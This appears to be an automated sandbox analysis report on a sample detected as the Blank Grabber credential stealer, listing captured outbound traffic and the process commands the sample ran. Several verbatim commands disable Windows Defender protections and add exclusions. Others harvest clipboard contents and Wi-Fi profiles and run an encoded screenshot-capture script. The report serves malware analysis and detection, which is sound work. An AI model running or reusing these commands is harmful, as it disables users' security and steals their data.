                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: f7 6d 01 09 2e 8c b8 a4 e2 68 86 b6 32 99 d7 a3 6b 92 eb 39 c0 19 fb 71 25 22 c3 dd 5f 3f 62 1a cc a4 d3 d4 6f a8 18 5c 2c bd 5a e7 f7 7a a8 8a 83 4d 20 cc 1c ac d8 62 35 a9 f4 13 ff 24 fd ca 3d 58 8b 3b b6 9e 76 c7 57 62 fc 60 0a fe 2b 5c af 12 7f a4 ae ad ac 12 27 e3 37 8f 24 84 31 fd 25 26 e6 1c c1 d4 0c 89 be 17 22 85 5b d9 df 6e 54 d7 91 bf 03 65 11 bd fb e8 1a d7 fc e3 b5 97 1a 56 70 97 99 fd 40 a0 5a a1 00 f8 2a 2e 72 68 b3 cf 15 47 53 11 fc 12 2b 7b af ea 17 48 3a c3 2d 0b 9e c1 27 b1 7d 3f 58 71 24 9d 50 0a da bf a7 23 24 dc a2 33 72 97 88 5c 97 6e f2 77 cf ce 7d 43 63 3e 09 f4 7c ef df 5d c9 02 66 f7 d8 9a 38 e3 c4 72 43 48 79 65 6c 30 1c 58 8e 14 4a f0 a0 92 f0 3a b2 35 a6 1b 8a ea 08 47 56 de f4 2f 7c 5c 47 ed f3 3f e6 85 15 34 0a 27 00 1b 65
                                                            Data Ascii: m.h2k9q%"_?bo\,ZzM b5$=X;vWb`+\'7$1%&"[nTeVp@Z*.rhGS+{H:-'}?Xq$P#$3r\nw}Cc>|]f8rCHyel0XJ:5GV/|\G?4'e
                                                            2024-07-20 20:16:32 UTC1239INHTTP/1.1 200 OK
                                                            Date: Sat, 20 Jul 2024 20:16:32 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            CF-Ray: 8a65a1279d6572b7-EWR
                                                            CF-Cache-Status: DYNAMIC
                                                            Set-Cookie: __dcfduid=f4e6b77e46d411efb37faa1e6a0ff386; Expires=Thu, 19-Jul-2029 20:16:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Vary: Accept-Encoding
                                                            Via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            X-Content-Type-Options: nosniff
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1721506593
                                                            x-ratelimit-reset-after: 1
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2L3VMy9NAmbPhLy4j11tEGpQBpQ16ADtQv%2Bs5F9eO98hgB9PPy5LdFCUVyk%2BSjA6J%2BM3U54hKHRGB8T0umr47xYZyczO2yqxdNVWAwOVNRSF2oO6SBphrS%2FoLZ7p5MfLdYbp1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:16:16:05
                                                            Start date:20/07/2024
                                                            Path:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\e45AiBoV6X.exe"
                                                            Imagebase:0x7ff6fb1e0000
                                                            File size:6'146'615 bytes
                                                            MD5 hash:3E6D7972822636F67CCF275EBD140188
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1720264732.000001F32EEE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1720264732.000001F32EEE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:16:16:05
                                                            Start date:20/07/2024
                                                            Path:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\e45AiBoV6X.exe"
                                                            Imagebase:0x7ff6fb1e0000
                                                            File size:6'146'615 bytes
                                                            MD5 hash:3E6D7972822636F67CCF275EBD140188
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1982629773.000002290B711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:16:16:07
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:16:16:07
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:16:16:07
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:16:16:07
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:16:16:08
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:16:16:08
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:16:16:09
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:16:16:09
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:16:16:09
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:16:16:09
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff70fdd0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff70fdd0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                            Imagebase:0x7ff7db190000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-Clipboard
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff70fdd0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:28
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\netsh.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:netsh wlan show profile
                                                            Imagebase:0x7ff7c5350000
                                                            File size:96'768 bytes
                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:29
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:30
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:31
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAH